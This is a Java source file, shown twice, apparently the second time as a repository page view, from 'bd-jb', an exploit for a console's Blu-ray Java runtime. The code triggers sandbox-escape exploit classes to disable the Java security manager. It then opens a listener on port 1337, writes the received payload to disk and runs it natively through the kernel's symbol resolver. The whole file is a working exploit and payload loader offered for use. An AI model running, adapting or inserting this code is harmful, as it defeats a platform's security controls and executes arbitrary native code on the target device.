bd-jb/com/bdjb/Exploit.java

/*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license.  See the LICENSE file for details.
 */

package com.bdjb;

import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.net.ServerSocket;

class Exploit implements Runnable {
  static void init() {
    Screen.println("[+] bd-jb by theflow");

    Screen.println("[*] Disabling security manager...");

    ExploitInterface[] exploits =
        new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};

    for (int i = 0; i < exploits.length; i++) {
      try {
        exploits[i].trigger();
        if (System.getSecurityManager() == null) {
          break;
        }
      } catch (Exception e) {
        continue;
      }
    }

    if (System.getSecurityManager() != null) {
      Screen.println("[-] Error could not disable security manager.");
    }
  }

  static void start() {
    new Thread(new Exploit()).start();
  }

  public void run() {
    if (System.getSecurityManager() != null) {
      return;
    }

    try {
      Screen.println("[*] Installing native API...");
      API api = API.getInstance();

      Screen.println("[*] Enabling JIT...");
      JIT jit = JIT.getInstance();

      Screen.println("[*] Waiting for payload...");

      ServerSocket serverSocket = new ServerSocket(1337);
      Socket socket = serverSocket.accept();

      Screen.println("[*] Downloading payload...");

      InputStream inputStream = socket.getInputStream();
      OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");

      byte[] buf = new byte[8192];
      int read;
      while ((read = inputStream.read(buf)) > 0) {
        outputStream.write(buf, 0, read);
      }

      outputStream.close();
      inputStream.close();

      socket.close();

      Screen.println("[*] Executing payload...");
      long sceKernelDlsym = api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym");
      long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin");
      int ret = (int) api.call(payload, sceKernelDlsym);
      Screen.println("[+] Result: " + Integer.toHexString(ret));
    } catch (Exception e) {
      Screen.println("[-] Error: " + e.getCause());
    }
  }
}
Initial commit. 2021-10-24 11:23:44 -04:00			`/*`
			`* Copyright (C) 2021 Andy Nguyen`
			`*`
			`* This software may be modified and distributed under the terms`
			`* of the MIT license. See the LICENSE file for details.`
			`*/`

			`package com.bdjb;`

			`import java.io.FileOutputStream;`
			`import java.io.InputStream;`
			`import java.io.OutputStream;`
			`import java.net.Socket;`
			`import java.net.ServerSocket;`

			`class Exploit implements Runnable {`
			`static void init() {`
			`Screen.println("[+] bd-jb by theflow");`

			`Screen.println("[*] Disabling security manager...");`

			`ExploitInterface[] exploits =`
			`new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};`

			`for (int i = 0; i < exploits.length; i++) {`
			`try {`
			`exploits[i].trigger();`
			`if (System.getSecurityManager() == null) {`
			`break;`
			`}`
			`} catch (Exception e) {`
			`continue;`
			`}`
			`}`

			`if (System.getSecurityManager() != null) {`
			`Screen.println("[-] Error could not disable security manager.");`
			`}`
			`}`

			`static void start() {`
			`new Thread(new Exploit()).start();`
			`}`

			`public void run() {`
			`if (System.getSecurityManager() != null) {`
			`return;`
			`}`

			`try {`
			`Screen.println("[*] Installing native API...");`
			`API api = API.getInstance();`

			`Screen.println("[*] Enabling JIT...");`
			`JIT jit = JIT.getInstance();`

			`Screen.println("[*] Waiting for payload...");`

			`ServerSocket serverSocket = new ServerSocket(1337);`
			`Socket socket = serverSocket.accept();`

			`Screen.println("[*] Downloading payload...");`

			`InputStream inputStream = socket.getInputStream();`
			`OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");`

			`byte[] buf = new byte[8192];`
			`int read;`
			`while ((read = inputStream.read(buf)) > 0) {`
			`outputStream.write(buf, 0, read);`
			`}`

			`outputStream.close();`
			`inputStream.close();`

			`socket.close();`

			`Screen.println("[*] Executing payload...");`
			`long sceKernelDlsym = api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym");`
			`long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin");`
			`int ret = (int) api.call(payload, sceKernelDlsym);`
			`Screen.println("[+] Result: " + Integer.toHexString(ret));`
			`} catch (Exception e) {`
			`Screen.println("[-] Error: " + e.getCause());`
			`}`
			`}`
			`}`